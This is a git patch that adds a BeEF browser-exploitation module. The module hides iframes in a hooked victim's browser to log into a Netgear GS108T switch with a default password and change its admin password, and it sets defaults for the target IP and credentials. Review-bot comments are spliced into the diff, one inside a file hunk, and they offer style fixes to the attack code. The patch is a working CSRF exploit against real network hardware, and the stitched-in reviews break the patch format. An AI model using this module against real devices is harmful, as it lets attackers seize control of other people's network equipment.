From d354e66a3d5a0c142a05e8bfc83661ba9e4667b4 Mon Sep 17 00:00:00 2001
From: root
Date: Thu, 17 May 2012 00:47:33 +0200
Subject: [PATCH] Added module for GS108t managed switch
---
modules/switch/netgear_gs108t_csrf/command.js | 47 +++++++++++++++++++
.../switch/netgear_gs108t_csrf/config.yaml | 25 ++++++++++
modules/switch/netgear_gs108t_csrf/module.rb | 30 ++++++++++++
3 files changed, 102 insertions(+)
create mode 100644 modules/switch/netgear_gs108t_csrf/command.js
create mode 100644 modules/switch/netgear_gs108t_csrf/config.yaml
create mode 100644 modules/switch/netgear_gs108t_csrf/module.rb
diff --git a/modules/switch/netgear_gs108t_csrf/command.js b/modules/switch/netgear_gs108t_csrf/command.js
new file mode 100644
index 000000000..b6c9af227
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/command.js
@@ -0,0 +1,47 @@
+//
+// Copyright 2012 Bart Leppens
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var oldpassword = '<%= @oldpassword %>';
+ var newpassword = '<%= @newpassword %>';
+
+ var gs_iframe = beef.dom.createInvisibleIframe();
+ gs_login = function() {
+ var d = new Date;
+ var rtime = (d.getTime() / 200);
+ gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);
+ }
+
+ var gs108t_iframe = beef.dom.createInvisibleIframe();
+ gs_change_pwd = function() {
+ gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);
+ }
+
+ //login to create the cookie
+ gs_login();
+
+ //wait some miliseconds and attempt to change the password
+ setTimeout("gs_change_pwd()", 500);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(gs108t_iframe);
+ document.body.removeChild(gs_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+});
+
diff --git a/modules/switch/netgear_gs108t_csrf/config.yaml b/modules/switch/netgear_gs108t_csrf/config.yaml
new file mode 100644
index 000000000..551964d58
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/config.yaml
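Review bot: `gs_login`, `gs_change_pwd` and `cleanup` are assigned without `var`, so they become implicit globals on the hooked page's window, and the two `setTimeout` calls pass their names as strings, which is the eval form of that API and is the only reason those globals are needed. Declaring the three functions with `var` inside the `beef.execute` callback and handing the function references to `setTimeout` keeps the module's state in its own closure and removes the string evaluation. The `var d = new Date;` line in `gs_login` should also read `new Date();` to match the call style used elsewhere in the file. Only the changed lines are shown below; the rest of the callback stays as committed.

```javascript
beef.execute(function() {
    // … unchanged: base / oldpassword / newpassword, gs_iframe …
    var gs_login = function() {
        var d = new Date();
        // … unchanged: rtime and src assignment …
    };

    // … unchanged: gs108t_iframe …
    var gs_change_pwd = function() {
        // … unchanged: src assignment …
    };

    gs_login();
    setTimeout(gs_change_pwd, 500);

    // … unchanged: beef.net.send …

    var cleanup = function() {
        // … unchanged: removeChild calls …
    };
    setTimeout(cleanup, 15000);
});
```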
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Bart Leppens
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ Netgear_gs108t_csrf:
+ enable: true
+ category: "Switch"
+ name: "Netgear GS108T CSRF"
+ description: "Attempts to change the password on a Netgear GS108T managed switch."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["ALL"]
diff --git a/modules/switch/netgear_gs108t_csrf/module.rb b/modules/switch/netgear_gs108t_csrf/module.rb
new file mode 100644
index 000000000..bf87ef66a
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright 2012 Bart Leppens
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Netgear_gs108t_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://192.168.0.139/'},
+ {'name' => 'oldpassword', 'ui_label' => 'Old Password', 'value' => 'password'},
+ {'name' => 'newpassword', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
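Review bot: `self.options` labels `base` only as "Switch web root", but command.js in this same commit builds its URLs by plain concatenation (`base+'login.cgi'`, `base+'password.cgi'`), so a value without a trailing `/` appears to produce a malformed host rather than a path; the default happens to satisfy the contract, but nothing records it. A comment above the option, such as `# 'base' must end with a trailing slash; command.js appends the CGI names directly to it`, would make that requirement visible where the value is configured. The explicit `return [` is also unnecessary in Ruby, as the array literal is already the method's last expression. `post_execute` persists whatever `@datastore['result']` holds, and since command.js always sends the fixed string `result=exploit attempted`, the stored result only means the module ran, not that either request was issued or accepted; the module description or a comment on `post_execute` should say so.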